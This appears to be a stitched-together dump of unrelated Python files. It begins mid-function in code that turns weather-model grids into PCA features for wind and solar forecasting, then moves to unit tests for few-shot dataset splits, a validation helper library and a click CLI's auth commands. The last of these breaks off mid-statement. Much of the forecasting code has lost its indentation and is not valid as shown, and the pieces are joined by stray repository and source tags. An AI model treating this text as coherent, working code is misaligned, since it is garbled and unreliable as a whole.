X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud' if var=='Cloud' else 'direction'
var_sort = 'cl' if var=='Cloud' else 'wd'
col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X2 = np.transpose(data[var],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'Temp' if var == 'Temperature' else 'wind'
var_sort = 'tp' if var == 'Temperature' else 'ws'
col = [var_name]
X = X2_level0
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
return dataset_X
def dataset_for_multiple_farms_offline(self, data, areas, lats_group, longs_group):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour','month'])])
for var in self.variables:
for area_name, area in areas.items():
if len(area) > 1:
lats = (np.where((lats_group[:, 0] >= area[0, 0]) & (lats_group[:, 0] <= area[1, 0])))[0]
longs = (np.where((longs_group[0, :] >= area[0, 1]) & (longs_group[0, :] <= area[1, 1])))[0]
else:
lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = data[var + '_prev'][:, lats, :][:, :, longs]
X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
level = var + '_prev_' + area_name
self.logger.info('Begin PCA training for %s', level)
X0_compressed = self.PCA_transform(X0, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = data[var + '_next'][:, lats, :][:, :, longs]
X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
level = var + '_next_' + area_name
self.logger.info('Begin PCA training for %s', level)
X2_compressed = self.PCA_transform(X2, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'flux_' + area_name if var=='Flux' else 'wind_' + area_name
var_sort = 'fl_' + area_name if var=='Flux' else 'ws_' + area_name
col = ['p_' + var_name + '.' + str(i) for i in range(3)]
col += ['n_' + var_name + '.' + str(i) for i in range(3)]
col += [var_name + '.' + str(i) for i in range(9)]
X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud_' + area_name if var=='Cloud' else 'direction_' + area_name
var_sort = 'cl_' + area_name if var=='Cloud' else 'wd_' + area_name
col = [var_name + '.' + str(i) for i in range(9)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
var_sort = 'tp_' + area_name if var == 'Temperature' else 'ws_' + area_name
col = [var_name + '.' + str(i) for i in range(3)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
col = []
col_p = []
col_n = []
for area_name, area in areas.items():
var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
var_name = 'flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
var_name = 'p_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
var_name = 'n_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
elif var in {'WD', 'Cloud'}:
col = []
for area_name, area in areas.items():
var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
var_name = 'cloud' if var == 'Cloud' else 'direction'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
col = []
for area_name, area in areas.items():
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(3)]
var_name = 'Temp' if var == 'Temperature' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
return dataset_X
def make_dataset_res_online(self, utc=False):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
data, X_3d = self.get_3d_dataset_online(utc)
if not isinstance(self.areas, dict):
X = self.dataset_for_single_farm_online(data)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
X = self.dataset_for_multiple_farms_online(data, self.areas, lats_group, longs_group)
return X, X_3d
    def get_3d_dataset_online(self, utc):
        """Stack NWP grids for a single forecast issue (online inference).

        ``self.dates`` is used as one base timestamp here (not a sequence).
        Returns ``(data_var, X_3d)`` like the offline variant, but built from
        a single ``stack_daily_nwps`` call.
        """
        def datetime_exists_in_tz(dt, tz):
            # True if `dt` can be localized to `tz` (filters out times that
            # do not exist because of DST transitions).
            try:
                dt.tz_localize(tz)
                return True
            except:
                return False
        dates_stack = []
        if utc:
            # NOTE(review): only this branch filters against self.data.index;
            # the local-time branch below does not — confirm this asymmetry
            # is intentional.
            pdates = pd.date_range(self.dates + pd.DateOffset(hours=25), self.dates + pd.DateOffset(hours=48), freq='H')
            dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
            dates_stack.append(dates)
        else:
            # Local-time path: drop non-existent local times, then convert
            # Europe/Athens wall-clock hours to UTC before formatting.
            pdates = pd.date_range(self.dates + pd.DateOffset(hours=25), self.dates + pd.DateOffset(hours=48), freq='H')
            indices = [i for i, t in enumerate(pdates) if datetime_exists_in_tz(t, tz=timezone('Europe/Athens'))]
            pdates = pdates[indices]
            pdates = pdates.tz_localize(timezone('Europe/Athens'))
            pdates = pdates.tz_convert(timezone('UTC'))
            dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
            dates_stack.append(dates)
        # Single area uses self.areas directly; multi-area uses the group box.
        if not isinstance(self.areas, dict):
            arrays = stack_daily_nwps(self.dates, dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas, self.variables, self.compress, self.static_data['type'])
        else:
            arrays = stack_daily_nwps(self.dates, dates_stack[0], self.path_nwp_project, self.nwp_model, self.area_group,
                                      self.variables, self.compress, self.static_data['type'])
        # Seed every output key with an empty array before accumulation;
        # the primary variable gets previous/current/next-hour slots.
        X = np.array([])
        data_var = dict()
        for var in self.variables:
            if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
                data_var[var+'_prev'] = X
                data_var[var] = X
                data_var[var+'_next'] = X
            else:
                data_var[var] = X
        data_var['dates'] = X
        X_3d = np.array([])
        nwp = arrays[0]
        x_2d = arrays[1]
        # Skip accumulation entirely when the CNN input came back empty.
        if x_2d.shape[0]!=0:
            for var in nwp.keys():
                if var != 'dates':
                    data_var[var] = stack_3d(data_var[var], nwp[var])
                else:
                    data_var[var] = np.hstack((data_var[var], nwp[var]))
            X_3d = stack_3d(X_3d, x_2d)
            self.logger.info('NWP data stacked for date %s', arrays[2])
        return data_var, X_3d
def dataset_for_single_farm_online(self, data):
    """Create the flat (2-D) inference dataset for a single-farm project.

    ``data`` is the ``data_var`` mapping produced by
    ``get_3d_dataset_online``: variable name -> stacked grid array.
    Grid cells around the farm (assumed at index [2, 2] of a 5x5 grid
    after transposing — TODO confirm) are compressed per "ring" with
    ``self.PCA_transform`` and concatenated into one DataFrame indexed
    by ``data['dates']``.
    """
    dataset_X = pd.DataFrame()
    if self.static_data['type'] == 'pv':
        # Calendar features are only added for PV projects.
        hours = [dt.hour for dt in data['dates']]
        months = [dt.month for dt in data['dates']]
        dataset_X = pd.concat(
            [dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
    for var in self.variables:
        if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
            # Primary variable: use previous/current/next-hour grids.
            X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
            X0_level0 = X0[:, 2, 2]  # centre cell, previous hour
            X1 = np.transpose(data[var],[0, 2, 1])
            X1_level1 = X1[:, 2, 2]  # centre cell, current hour
            # Mid ring, "down/left" cells of the current-hour grid.
            ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
            ind = np.array(ind)
            X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
            level = var + '_curr_mid_down'
            self.logger.info('Begin PCA training for %s', level)
            X1_level3d = self.PCA_transform(X1_level3d, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            # Mid ring, "up/right" cells.
            ind = [[2, 3], [3, 2], [3, 3]]
            ind = np.array(ind)
            X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
            level = var + '_curr_mid_up'
            self.logger.info('Begin PCA training for %s', level)
            X1_level3u = self.PCA_transform(X1_level3u, 2, level)
            self.logger.info('Successfully PCA transform for %s', level)
            # Outer ring, "down/left" cells.
            ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
            ind = np.array(ind)
            X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
            level = var + '_curr_out_down'
            self.logger.info('Begin PCA training for %s', level)
            X1_level4d = self.PCA_transform(X1_level4d, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            # Outer ring, "up/right" cells.
            ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
            ind = np.array(ind)
            X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
            level = var + '_curr_out_up'
            self.logger.info('Begin PCA training for %s', level)
            X1_level4u = self.PCA_transform(X1_level4u, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            X2 = np.transpose(data[var + '_next'],[0, 2, 1])
            X2_level0 = X2[:, 2, 2]  # centre cell, next hour
            var_name = 'flux' if var=='Flux' else 'wind'
            var_sort = 'fl' if var=='Flux' else 'ws'
            # 14 columns matching the 14 stacked features below.
            col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
            col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in range(2)]
            col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in range(3)]
            X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d, X1_level4u))
            dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
        elif var in {'WD', 'Cloud'}:
            # Secondary grid variables: same ring compression, current hour only.
            X1 = np.transpose(data[var],[0, 2, 1])
            X1_level1 = X1[:, 2, 2]
            ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
            ind = np.array(ind)
            X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
            level = var + '_curr_mid_down'
            self.logger.info('Begin PCA training for %s', level)
            X1_level3d = self.PCA_transform(X1_level3d, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            ind = [[2, 3], [3, 2], [3, 3]]
            ind = np.array(ind)
            X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
            level = var + '_curr_mid_up'
            self.logger.info('Begin PCA training for %s', level)
            X1_level3u = self.PCA_transform(X1_level3u, 2, level)
            self.logger.info('Successfully PCA transform for %s', level)
            ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
            ind = np.array(ind)
            X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
            level = var + '_curr_out_down'
            self.logger.info('Begin PCA training for %s', level)
            X1_level4d = self.PCA_transform(X1_level4d, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
            ind = np.array(ind)
            X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
            level = var + '_curr_out_up'
            self.logger.info('Begin PCA training for %s', level)
            X1_level4u = self.PCA_transform(X1_level4u, 3, level)
            self.logger.info('Successfully PCA transform for %s', level)
            var_name = 'cloud' if var=='Cloud' else 'direction'
            var_sort = 'cl' if var=='Cloud' else 'wd'
            col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in range(2)]
            col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in range(3)]
            X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d, X1_level4u))
            dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
        elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
            # Scalar variables: centre cell only, no PCA.
            X2 = np.transpose(data[var],[0, 2, 1])
            X2_level0 = X2[:, 2, 2]
            var_name = 'Temp' if var == 'Temperature' else 'wind'
            var_sort = 'tp' if var == 'Temperature' else 'ws'  # NOTE(review): unused in this branch
            col = [var_name]
            X = X2_level0
            dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
        else:
            continue
    dataset_X = dataset_X  # NOTE(review): no-op self-assignment, candidate for removal
    self.logger.info('Successfully dataset created for training for %s', self.project_name)
    return dataset_X
def dataset_for_multiple_farms_online(self, data, areas, lats_group, longs_group):
    """Create the flat (2-D) inference dataset for a multi-area project.

    For each variable and each area, the NWP grid cells falling inside
    the area's bounding box are flattened and compressed with
    ``self.PCA_transform``; the compressed columns are concatenated into
    one DataFrame indexed by ``data['dates']``. A second pass adds
    cross-area mean columns per variable.

    :param data: mapping of variable name -> stacked grid array
        (output of ``get_3d_dataset_online``).
    :param areas: mapping of area name -> bounding box
        ``[lat_min, long_min, lat_max, long_max]`` (inferred from the
        comparisons below — TODO confirm ordering).
    :param lats_group: latitude grid of the enclosing area group.
    :param longs_group: longitude grid of the enclosing area group.
    :return: the assembled ``pd.DataFrame``.
    """
    dataset_X = pd.DataFrame()
    if self.static_data['type'] == 'pv':
        # Calendar features are only added for PV projects.
        hours = [dt.hour for dt in data['dates']]
        months = [dt.month for dt in data['dates']]
        dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
    for var in self.variables:
        for area_name, area in areas.items():
            # Indices of grid cells inside this area's bounding box.
            lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
            longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
            if ((var == 'WS') and (self.static_data['type'] == 'wind')) or ((var == 'Flux') and (self.static_data['type'] == 'pv')):
                # Primary variable: compress previous/current/next-hour grids.
                X0 = data[var + '_prev'][:, lats, :][:, :, longs]
                X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
                level = var + '_prev_' + area_name
                self.logger.info('Begin PCA training for %s', level)
                X0_compressed = self.PCA_transform(X0, 3, level)
                self.logger.info('Successfully PCA transform for %s', level)
                X1 = data[var][:, lats, :][:, :, longs]
                X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
                level = var + area_name
                self.logger.info('Begin PCA training for %s', level)
                X1_compressed = self.PCA_transform(X1, 9, level)
                self.logger.info('Successfully PCA transform for %s', level)
                X2 = data[var + '_next'][:, lats, :][:, :, longs]
                X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
                level = var + '_next_' + area_name
                self.logger.info('Begin PCA training for %s', level)
                X2_compressed = self.PCA_transform(X2, 3, level)
                self.logger.info('Successfully PCA transform for %s', level)
                var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
                col = ['p_' + var_name + '.' + str(i) for i in range(3)]
                col += ['n_' + var_name + '.' + str(i) for i in range(3)]
                col += [var_name + '.' + str(i) for i in range(9)]
                X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
                dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
            elif var in {'WD', 'Cloud'}:
                X1 = data[var][:, lats, :][:, :, longs]
                X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
                level = var + area_name
                self.logger.info('Begin PCA training for %s', level)
                X1_compressed = self.PCA_transform(X1, 9, level)
                self.logger.info('Successfully PCA transform for %s', level)
                var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
                col = [var_name + '.' + str(i) for i in range(9)]
                X = X1_compressed
                dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
            elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
                X1 = data[var][:, lats, :][:, :, longs]
                X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
                level = var + area_name
                self.logger.info('Begin PCA training for %s', level)
                X1_compressed = self.PCA_transform(X1, 3, level)
                self.logger.info('Successfully PCA transform for %s', level)
                var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
                col = [var_name + '.' + str(i) for i in range(3)]
                X = X1_compressed
                dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
            else:
                continue
    # Second pass: cross-area mean columns per variable.
    for var in self.variables:
        if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
                (var == 'Flux') and (self.static_data['type'] == 'pv')):
            col = []
            col_p = []
            col_n = []
            for area_name, area in areas.items():
                var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
                col += [var_name + '.' + str(i) for i in range(9)]
                col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
                col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
            var_name = 'flux' if var == 'Flux' else 'wind'
            dataset_X[var_name] = dataset_X[col].mean(axis=1)
            # BUGFIX: the previous/next means used 'wind' as the fallback
            # name, overwriting the current-hour 'wind' column three
            # times; use 'p_wind'/'n_wind' to mirror the flux case.
            var_name = 'p_flux' if var == 'Flux' else 'p_wind'
            dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
            var_name = 'n_flux' if var == 'Flux' else 'n_wind'
            dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
        elif var in {'WD', 'Cloud'}:
            col = []
            for area_name, area in areas.items():
                var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
                col += [var_name + '.' + str(i) for i in range(9)]
            var_name = 'cloud' if var == 'Cloud' else 'direction'
            dataset_X[var_name] = dataset_X[col].mean(axis=1)
        elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
            col = []
            for area_name, area in areas.items():
                var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
                col += [var_name + '.' + str(i) for i in range(3)]
            var_name = 'Temp' if var == 'Temperature' else 'wind'
            dataset_X[var_name] = dataset_X[col].mean(axis=1)
    self.logger.info('Successfully dataset created for training for %s', self.project_name)
    return dataset_X
1847391 | <reponame>nathanielsimard/improving-fs-ssl
import unittest
from mcp.data.dataset.dataset import (
ComposedDataset,
ListDataset,
create_few_shot_datasets,
)
from tests.helpers.dataset import (
create_random_dataset,
item_equal,
unique_classes,
unique_samples,
)
# Shared fixture dimensions for the dataset tests below.
NUM_ITEMS = 100    # total samples in a generated dataset
NUM_CLASSES = 10   # number of distinct class labels
SHAPE = (24, 24)   # per-sample image shape
class ComposedDatasetTest(unittest.TestCase):
    """Tests for ComposedDataset: indexing across concatenated datasets."""

    def setUp(self):
        # Build three disjoint slices of one random dataset and compose them.
        samples = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE).samples  # type: ignore
        self.dataset_1 = ListDataset(samples[0:20])
        self.dataset_2 = ListDataset(samples[20:40])
        self.dataset_3 = ListDataset(samples[70:100])
        self.composed_dataset = ComposedDataset(
            [self.dataset_1, self.dataset_2, self.dataset_3]
        )

    def test_shouldContainsAllItems(self):
        """Items come back in order, as if the datasets were concatenated."""
        dataset = ListDataset(
            self.dataset_1.samples + self.dataset_2.samples + self.dataset_3.samples
        )
        for index in range(len(dataset)):
            self.assertTrue(item_equal(self.composed_dataset[index], dataset[index]))

    def test_shouldSupportNegativeIndex(self):
        """Negative indices count from the end, matching list semantics."""
        dataset = ListDataset(
            self.dataset_1.samples + self.dataset_2.samples + self.dataset_3.samples
        )
        for i in range(len(dataset)):
            index = -(i + 1)
            self.assertTrue(item_equal(self.composed_dataset[index], dataset[index]))

    def test_whenIndexToBig_shouldRaise(self):
        """Out-of-range indices (both signs) raise ValueError."""
        datasets = [
            create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE),
            create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE),
        ]
        dataset = ComposedDataset(datasets)
        self.assertRaises(ValueError, lambda: dataset[200])
        self.assertRaises(ValueError, lambda: dataset[201])
        self.assertRaises(ValueError, lambda: dataset[-201])
class FewShotDatasetTest(unittest.TestCase):
    """Tests for create_few_shot_datasets: train/test split invariants."""

    def test_shouldKeepAllSamples(self):
        """The split partitions the dataset: no sample is dropped."""
        dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
        train_dataset, test_dataset = create_few_shot_datasets(dataset, 5)
        self.assertEqual(NUM_ITEMS, len(train_dataset) + len(test_dataset))

    def test_shouldNotHaveDupplicatedSamples(self):
        """Train and test sets are disjoint (no duplicated samples)."""
        dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
        train_dataset, test_dataset = create_few_shot_datasets(dataset, 5)
        samples = unique_samples([train_dataset, test_dataset])
        self.assertEqual(len(samples), len(train_dataset) + len(test_dataset))

    def test_givenOneNumSample_trainDatasetShouldHaveOneSamplePerClass(self):
        dataset = create_random_dataset(NUM_ITEMS, NUM_CLASSES, SHAPE)
        train_dataset, test_dataset = create_few_shot_datasets(dataset, 1)
        classes_train = unique_classes(train_dataset)
        self.assertEqual(len(train_dataset), NUM_CLASSES)
        self.assertEqual(len(classes_train), NUM_CLASSES)

    def test_given5NumSamples_trainDatasetShouldHave5SamplesPerClass(self):
        num_samples = 5
        # We add more items to make sure all classes are included
        dataset = create_random_dataset(NUM_ITEMS * num_samples, NUM_CLASSES, SHAPE)
        train_dataset, test_dataset = create_few_shot_datasets(dataset, num_samples)
        classes_train = unique_classes(train_dataset)
        self.assertEqual(len(train_dataset), num_samples * NUM_CLASSES)
        self.assertEqual(len(classes_train), NUM_CLASSES)
| StarcoderdataPython |
from unittest import TestCase
from src.validationlib.validation import greaterThenZero, greaterOrEqualThenZero, validInt, validFloat


class TestValidationLib(TestCase):
    """Unit tests for the boolean validation helpers.

    Uses unittest's assertTrue/assertFalse instead of bare ``assert ==
    True/False``: PEP 8 discourages equality comparison with booleans,
    and TestCase assertions give proper failure messages.
    """

    def test_greater_than_zero_return_false(self):
        self.assertFalse(greaterThenZero(0))

    def test_greater_than_zero_return_true(self):
        self.assertTrue(greaterThenZero(1))

    def test_greater_or_equal_than_zero_return_false(self):
        self.assertFalse(greaterOrEqualThenZero(-1))

    def test_greater_or_equal_than_zero_return_true(self):
        self.assertTrue(greaterOrEqualThenZero(0))

    def test_valid_int_return_false(self):
        # Strings are not accepted as integers.
        self.assertFalse(validInt('1'))

    def test_valid_int_return_true(self):
        self.assertTrue(validInt(1))

    def test_valid_float_return_true_with_int(self):
        # Integers are accepted where a float is expected.
        self.assertTrue(validFloat(5))

    def test_valid_float_return_true(self):
        self.assertTrue(validFloat(10.2))
""" Tests for seed_services_cli.identity_store """
from unittest import TestCase
from click.testing import CliRunner
from seed_services_cli.main import cli
import responses
import json
class TestSendCommand(TestCase):
    """CLI tests for the auth-user-* commands.

    HTTP calls to the auth service are intercepted with the ``responses``
    library; the CLI is driven through click's ``CliRunner``.
    """

    def setUp(self):
        self.runner = CliRunner()

    def tearDown(self):
        pass

    # --- helpers to invoke the CLI with sensible defaults -------------

    def invoke_user_add(self, args, first_name="First", last_name="Last",
                        email="<EMAIL>", password="<PASSWORD>",
                        admin=False):
        """Invoke ``auth-user-add`` with the given extra ``args``."""
        if admin:
            args = args + ["--admin"]
        return self.runner.invoke(cli, [
            'auth-user-add',
            '--first_name', first_name,
            '--last_name', last_name,
            '--email', email,
            '--password', password,
        ] + args)

    def invoke_user_change_password(self, args, email, password):
        """Invoke ``auth-user-change-password`` for ``email``."""
        return self.runner.invoke(cli, [
            'auth-user-change-password',
            '--email', email,
            '--password', password,
        ] + args)

    def invoke_user_add_team(self, args, user=2, team=3):
        """Invoke ``auth-user-add-team`` for the given user/team ids."""
        return self.runner.invoke(cli, [
            'auth-user-add-team',
            '--user', user,
            '--team', team,
        ] + args)

    # --- tests --------------------------------------------------------

    def test_user_add_help(self):
        result = self.runner.invoke(cli, ['auth-user-add', '--help'])
        self.assertEqual(result.exit_code, 0)
        self.assertTrue(
            "Create a user"
            in result.output)

    @responses.activate
    def test_user_add_no_details(self):
        """Missing user details must exit with usage error (code 2)."""
        # setup
        login_response = {
            "token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
        }
        responses.add(responses.POST,
